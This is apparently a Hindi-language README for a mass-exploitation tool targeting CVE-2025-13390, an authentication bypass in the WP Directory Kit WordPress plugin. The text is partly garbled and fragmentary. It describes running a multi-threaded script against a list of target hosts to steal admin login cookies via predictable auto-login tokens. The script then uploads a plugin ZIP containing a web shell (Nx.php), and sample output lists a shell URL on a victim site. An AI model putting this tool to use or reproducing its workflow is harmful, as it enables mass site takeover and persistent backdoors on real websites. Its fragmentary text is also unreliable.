
WP Directory Kit <= 1.4.4 - प्रमाणीकरण बाईपास से विशेषाधिकार वृद्धि तक खाता अधिग्रहण के माध्यम से
WP Directory Kit <= 1.4.4 - प्रमाणीकरण बायपास से विशेषाधिकार वृद्धि तथा खाता अधिग्रहण
WordPress के लिए WP Directory Kit प्लगइन, संस्करण 1.4.4 तक (और सहित) के सभी संस्करणों में,
wdk_generate_auto_login_linkफ़ंक्शन में प्रमाणीकरण एल्गोरिदम के गलत कार्यान्वयन के कारण प्रमाणीकरण बायपास की भेद्यता है।यह इस सुविधा द्वारा क्रिप्टोग्राफिक रूप से कमज़ोर टोकन जनरेशन तंत्र के उपयोग के कारण होता है। यह दोष अप्रमाणित हमलावरों को प्रशासनिक पहुँच प्राप्त करने और पूर्वानुमानित टोकन के साथ ऑटो-लॉगिन एंडपॉइंट के माध्यम से पूर्ण साइट अधिग्रहण प्राप्त करने में सक्षम बनाता है।
- CNA: Wordfence
- बेस स्कोर: 10.0 CRITICAL
- वेक्टर:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Nx.php नामक होने की उम्मीद)।Nx.php) के माध्यम से शेल पहुँच प्रदान की जाती है।pip install -r requirements.txt
# या अलग-अलग:
pip install requests beautifulsoup4 colorama
Nxploited.zip) की अपेक्षा करती है जिसमें आपका शेल रूट में Nx.php नाम से हो।list.txt) तैयार करें जिसमें प्रति पंक्ति एक URL/होस्ट हो।http(s)://) शामिल हो सकता है या केवल डोमेन/IP हो सकते हैं।http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101

python3 CVE-2025-13390.py
list.txt है।Nxploited.zip है।success_cookies.txt — वे साइटें जहाँ सफल व्यवस्थापक कुकीज़ निकाली गईं।success_shells.txt — सफलतापूर्वक अपलोड किए गए शेल के URL।uploads_log.txt — प्लगइन अपलोड प्रयासों का पूरा लॉग। _______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
द्वारा: Nxploited (Khaled ALenazi)
टेलीग्राम: @Nxploited
GitHub: https://github.com/Nxploited
पेशेवर WordPress कुकी शोषण और प्लगइन अपलोडर।
विशेषताएँ: लॉगिन कुकीज़ निकालता है, प्लगइन अपलोड करता है (डिफ़ॉल्ट: Nxploited.zip), शेल को Nx.php के रूप में अपेक्षित करता है।
परिणाम: सफल शेल success_shells.txt में, सफल कुकीज़ success_cookies.txt में।
अत्यधिक स्वचालित। मल्टी-थ्रेडेड। केवल अधिकृत ऑडिटिंग के लिए।
लक्ष्य फ़ाइल [डिफ़ॉल्ट: list.txt]:
थ्रेड [डिफ़ॉल्ट: 8]:
लक्ष्य उपयोगकर्ता आईडी [डिफ़ॉल्ट: 1]:
टोकन [डिफ़ॉल्ट: a1b2c3d4e5]:
प्लगइन ZIP फ़ाइल पथ [डिफ़ॉल्ट: Nxploited.zip]:
प्लगइन फ़ोल्डर नाम? [डिफ़ॉल्ट: Nxploited]:
याद रखें: सुनिश्चित करें कि प्लगइन ZIP के अंदर आपकी शेल फ़ाइल Nx.php नाम की हो।
लोड किए गए 42 लक्ष्य, 8 थ्रेड।
...
[SUCCESS] http://victim.com: कुकी निकाली गई
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
समाप्त। शेल URL success_shells.txt में, कुकीज़ success_cookies.txt में।
8, 16, आदि)1 = व्यवस्थापक)/wp-content/plugins/ के अंतर्गत आपके पेलोड के लिए उपफ़ोल्डर (डिफ़ॉल्ट zip नाम से लिया गया)